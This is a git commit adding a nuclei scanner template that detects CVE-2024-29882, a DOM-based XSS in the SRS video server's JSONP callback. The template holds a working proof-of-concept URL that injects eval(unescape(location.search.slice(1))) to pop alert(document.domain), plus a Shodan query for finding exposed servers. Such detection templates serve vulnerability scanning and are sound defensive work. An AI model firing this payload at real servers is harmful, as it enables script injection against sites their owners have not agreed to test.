Merge pull request #10692 from projectdiscovery/CVE-2024-29882

Create CVE-2024-29882.yaml (DOM - XSS on JSONP callback)
2024-09-06 10:44:39 +04:00 · 2024-09-06 10:44:39 +04:00 · d08f7c4b43
parent 4ac579d5e6 daf42e112a
commit d08f7c4b43
1 changed files with 48 additions and 0 deletions
--- a/headless/cves/2024/CVE-2024-29882.yaml
+++ b/headless/cves/2024/CVE-2024-29882.yaml
@ -0,0 +1,48 @@
+id: CVE-2024-29882
+
+info:
+  name: HTTP API DOM - XSS on JSONP callback
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: high
+  description: |
+    SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
+  reference:
+    - https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
+    - https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2024-29882
+    cwe-id: CWE-79
+    epss-score: 0.00043
+    epss-percentile: 0.09568
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: ossrs
+    product: simple_realtime_server
+    shodan-query: http.favicon.hash:1386054408
+  tags: cve,cve2023,srs,dom,xss
+
+headless:
+  - steps:
+      - args:
+          url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
+        action: navigate
+
+      - action: waitdialog
+        name: object_dom
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - object_dom == true
+
+      - type: word
+        part: body
+        words:
+          - "<title>SRS"
+          - "ConnectSRS</a>"
+        condition: or
+        case-insensitive: true